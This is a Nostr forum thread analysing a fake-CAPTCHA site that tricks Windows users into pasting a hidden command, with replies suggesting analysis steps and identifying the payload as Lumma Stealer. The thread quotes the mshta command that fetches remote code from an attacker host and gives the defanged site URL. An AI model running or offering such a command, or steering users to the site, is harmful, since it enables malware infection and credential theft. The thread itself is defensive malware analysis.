Nostr Web Client

Can anybody on Nostr do malware analysis in the wild?

This website shows a fake CAPTCHA only for Windows users. The CAPTCHA tricks the user into hitting Win + R and Ctrl + V to paste a seemingly innocent looking verification ID into the run console which the website already copied to the user's clipboard upon visiting the site. It's easily missed that part of the pasted string is not visible and actually runs "mshta .icu/gkcxv.google?i=" that executes arbitrary code on the victim's machine.

The source code of the website has a heavily obfuscated script which seems to fetch and construct a payload that is eventually executed using eval() without any user input upon visiting the site. The site also seems to store some data to Ethereum smart contracts every few seconds for some reason.

I'm trying to figure out what the stage 2 mshta payload actually does and does the site actually run something with the mshta utility that can escape the browser sandbox. The payload is fetched from some very short-lived command & control servers so it's hard to scrape the payload code directly. Does someone have the expertise to investigate this?

The *malicious* website:

https://gameskeys(.)net/we-were-here-forever-controls-guide

#asknostr nostr:nprofile1qqsyawyrzrttfmv4cmtx5w2m85702kdct7hv3amfrkhagpdf9cz46mgprpmhxue69uhkv6tvw3jhytnwdaehgu3wwa5kuef0qyghwumn8ghj7mn0wd68ytnhd9hx2tcpydmhxue69uhkv6tvw3jhytnwdaehgu3wwa5kuef08ankcmmzv9kr6ctvds20l3q3

Reply to this note

Please Login to reply.

Discussion

Ava 9mo ago

Unfortunately, I don’t have much time to dive deeply into this right now, but off the top of my head, this looks like a sophisticated attack leveraging mshta(.)exe to execute malicious code outside the browser sandbox.

The fake CAPTCHA trick is clever, as it uses social engineering to get users to run a command that fetches a second-stage payload.

The obfuscated JavaScript on the site is constructing and executing the payload dynamically using eval(). The use of Ethereum smart contracts for storing or distributing C2 server addresses is particularly notable—there is a growing trend in malware campaigns to leverage blockchain technology for resilience, as blockchain-based infrastructure is much harder to disrupt.

To figure out what the stage 2 payload does, you’d need to:

1. Capture the payload: Use a network proxy or sandbox to intercept the HTTP request made by mshta(.)exe and retrieve the payload.

2. Deobfuscate the JavaScript: Tools like jsbeautifier can help reveal how the payload is constructed.

3. Analyze the payload: Static and dynamic analysis in a controlled environment should provide insight into its behavior.

Blocking mshta(.)exe via group policies is a good mitigation step if it’s not required in your environment. Again, I’m swamped at the moment, but I hope this helps as a starting point. Let me know what you find out.

cypherhoodlum🏴‍☠️ 9mo ago

Thanks a bunch, I didn't realize ETH smart contracts were used to distribute the C2 addresses 💡

Laeserin 9mo ago

nostr:npub1qdjn8j4gwgmkj3k5un775nq6q3q7mguv5tvajstmkdsqdja2havq03fqm7 have you seen this? 👀

cypherhoodlum🏴‍☠️ 9mo ago

UPDATE:

The malicious payload seems to be Lumma Stealer that doesn't establish persistence on the victim's machine. Only affects Windows users.